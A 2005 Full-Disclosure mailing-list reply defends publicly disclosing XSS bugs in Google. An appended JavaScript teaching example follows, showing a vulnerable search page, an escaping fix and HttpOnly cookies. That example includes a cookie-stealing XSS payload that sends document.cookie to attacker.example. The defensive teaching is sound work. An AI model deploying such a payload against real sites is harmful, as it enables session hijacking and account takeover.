Re: [Full-disclosure] XSS vulnerabilities in Google.com
- To: GroundZero Security <fd@xxxxxxx>
- Subject: Re: [Full-disclosure] XSS vulnerabilities in Google.com
- From: Mohit Muthanna <mohit.muthanna@xxxxxxxxx>
- Date: Wed, 21 Dec 2005 09:02:08 -0500
On 12/21/05, GroundZero Security <fd@xxxxxxx> wrote:
> Are we starting to post vulnerabilities in specific websites now rather than
> daemons/clients etc.?
When it's a website with a user-base as large as what Google has, yes.
When there is a possibility that user accounts can be compromised, yes.
> I mean there are thousands of websites which are vulnerable to XSS, SQL
> injection or worse because of their custom scripts.
Sure, but "google != howardsblog.com". A large part of the population
(including myself) relies on Google's various services for day-to-day
use. I sure as hell would not feel comfortable knowing that I'm using
a service that can potentially leak my information.
If there is a vulnerability, no matter how trivial, the public needs to know.
> In my opinion this should be posted to the website owners if you feel like
> it, but it's of no real use to the security community.
That's quite a blanket statement to make. I'm sure a few people in the
"security community" would like to know that there exists a
vulnerability in a Google service.
> Hm, another thing I'm wondering about is, is it legal to just audit a
> website without asking the owner if it's OK?
No. But a site need not be audited to discover a bug.
> How will he know it's not a real attack? OK, as for XSS there can't be much
> harm done to the server itself,
XSS can do a lot of harm. A compromised administrator account is
generally a compromised server. There are some good XSS resources on
the web you can read up on.
The bug that was discovered by the parent poster may not lead to a
server compromise; but that is no reason to discount or underestimate
XSS.
> but what if, for example, you cause a DoS through testing certain variables
> for overflows?
Then, my friend, you have discovered a bug.
Mohit.
--
Mohit Muthanna [mohit (at) muthanna (uhuh) com]
"There are 10 types of people. Those who understand binary, and those
who don't."
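The point made above, that a reflected XSS bug is enough to take over an account and, if it is an administrator's, often the server behind it, is easier to see in code. The following is an added example and is not part of the original message or of any Google code: a minimal search-results page rendered by string concatenation, the same page with output encoding, and a constructed cookie-stealing payload. The host attacker.example and the cookie name are assumptions for illustration.

```javascript
// Added example, not from the original thread: reflected XSS in a search
// results page and the output-encoding fix. Plain Node.js, no dependencies.

// Constructed attacker input: breaks out of the value="" attribute and ships
// the victim's cookies to a hypothetical attacker host (attacker.example is
// an assumption). If those cookies carry an admin session, the attacker now
// holds that session.
const PAYLOAD =
  '"><script>new Image().src="https://attacker.example/c?"' +
  '+encodeURIComponent(document.cookie)</script>';

// Vulnerable: the query parameter is concatenated straight into the HTML,
// both in element content and inside a quoted attribute.
function renderSearchVulnerable(q) {
  return '<html><body><h1>Results for: ' + q + '</h1>' +
         '<input name="q" value="' + q + '"></body></html>';
}

// Fix: encode the HTML metacharacters before untrusted data reaches the page.
// '&' must be replaced first so later replacements are not double-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

function renderSearchSafe(q) {
  const e = escapeHtml(q);
  return '<html><body><h1>Results for: ' + e + '</h1>' +
         '<input name="q" value="' + e + '"></body></html>';
}

// Defence in depth: a session cookie the browser will not expose to
// document.cookie, so even a successful injection cannot read it.
// (Cookie name "session" is an assumption.)
function sessionCookieHeader(value) {
  return 'session=' + encodeURIComponent(value) +
         '; Path=/; Secure; HttpOnly; SameSite=Lax';
}

// Crude check used by the demo below: is there a live <script> element in
// the rendered page?
function hasInjectedScript(html) {
  return /<script[\s>]/i.test(html);
}

console.log('vulnerable page executes attacker script:',
            hasInjectedScript(renderSearchVulnerable(PAYLOAD)));
console.log('encoded page executes attacker script:   ',
            hasInjectedScript(renderSearchSafe(PAYLOAD)));
console.log(sessionCookieHeader('abc123'));
```

Context matters: the same value placed inside a URL, a JavaScript string or a CSS block needs a different encoder than the HTML-entity one shown here, which is why templating engines that encode per context are preferred over hand-rolled escaping.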
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/